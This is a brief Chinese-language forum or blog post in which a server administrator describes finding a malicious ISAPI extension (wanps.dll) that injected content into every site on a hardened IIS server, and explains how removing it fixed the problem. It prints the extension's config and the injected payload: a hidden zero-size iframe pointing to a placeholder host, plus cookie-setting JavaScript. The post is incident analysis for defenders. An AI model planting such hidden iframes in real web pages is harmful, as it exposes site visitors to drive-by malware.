做了安全配置的IIS服务器仍被挂马问题探讨

最新，笔者单位有台服务器，全服务器所有网站都被挂马（前提是笔者已经做了FSO安全配置，每个网站都设定单独访问用户），不仅是ASP文件被挂马，甚至有些HTML文件也被挂马，查看源代码中却找不到挂马的代码。被挂马的网站头部都显示如下形式的代码：

<iframe src="http://xxx.xxx/xxx height=0 width=0></iframe>

起初怀疑是JS代码搞鬼，查看服务器上所有JS文件，找了半天也没发现。于是我就新建一个HTML文件，然后浏览，依然有上面形式的代码(我晕~~~怀疑自己机子中木马，换台机器依然如此，而且上其他网站好的)。

实在是没折了，打开IIS看看呢，问题找到了，在主IIS上，右击【属性】，在ISAPI里发现一个ISAPI扩展，从没见过的，路径为：C:\WINDOWS\Help\wanps.dll，加载正常，取消此ISAPI扩展，重新启动IIS后，所有代码消失，问题到此解决，就是这个ISAPI扩展搞的鬼，下面来瞧瞧加载项的具体内容：

wanps.ini内容为：
Cookie=GAG5=ABCDEFG
Redirector=C:\windows\help\wanps.txt

wanps.txt内容为：
<body>
<iframe src="http://xxx.xxx/xxx height=0 width=0></iframe>
<script language="javascript">
<!--
var expires = new Date();
expires.setTime(expires.getTime() + 5 * 24* 60 * 60 * 1000);
document.cookie="GAG5=ABCDEFG;expires="+expires.toGMTString();
-->
</script>
</body>